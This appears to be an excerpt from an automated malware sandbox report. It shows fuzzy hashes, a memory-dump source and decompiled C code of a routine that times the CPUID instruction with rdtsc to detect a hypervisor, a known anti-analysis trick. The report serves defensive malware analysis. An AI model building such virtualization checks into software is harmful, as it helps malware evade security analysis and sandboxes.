• Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
• Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
• Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
E003C1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
	signed int _t18;
	signed long long _t31;
	signed long long _t34;
	signed long long _t41;
	signed long long _t42;
	signed long long _t43;
	signed long long _t44;
	void* _t45;
	signed long long _t47;
	long long _t49;
	void* _t51;
	void* _t52;

	_t47 = __rsi;
	_t41 = __rdx;
	_t31 = __rax;
	*((long long*)(_t51 + 8)) = __rbx;
	*((long long*)(_t51 + 0x10)) = _t49;
	*((long long*)(_t51 + 0x18)) = __rsi;
	_push(_t45);
	_t52 = _t51 - 0x30;
	/* Timing loop: reads the time-stamp counter before and after CPUID and
	   accumulates the deltas over _t49 iterations. This is the pattern the
	   report flags as "detect hardware virtualization (CPUID execution
	   measurement)": CPUID traps to the hypervisor under virtualization,
	   so its measured cost is much higher than on bare metal. */
	do {
		SwitchToThread();
		asm("rdtsc");
		_t42 = _t41 << 0x20;
		asm("cpuid");
		*((intOrPtr*)(_t52 + 0x20)) = 1;
		*((intOrPtr*)(_t52 + 0x24)) = __ebx;
		*((intOrPtr*)(_t52 + 0x28)) = 0;
		*((intOrPtr*)(_t52 + 0x2c)) = __edx;
		asm("rdtsc");
		_t43 = _t42 << 0x20;
		_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
		_t45 = _t45 + _t34;
		/* Second measurement: two back-to-back rdtsc reads with no CPUID in
		   between, giving a baseline to compare against the CPUID timing. */
		_t18 = SwitchToThread();
		asm("rdtsc");
		_t44 = _t43 << 0x20;
		asm("rdtsc");
		_t41 = _t44 << 0x20;
		_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
		_t47 = _t47 + _t31;
		_t49 = _t49 - 1;
	} while (_t49 != 0);
	return _t18 / _t47;
}

Memory Dump Source
• Source File: 00000004.00000002.2088664325.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction ID: 96279688599f55324209394d83c8de183ba2747c31ca13cd73282722d817bc41
• Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction Fuzzy Hash: 0601B172B24B908BDF248F36B600349B6A2F38D7C4F148535EB9C83B18DA3CD5958B04
Uniqueness

Uniqueness Score: -1.00%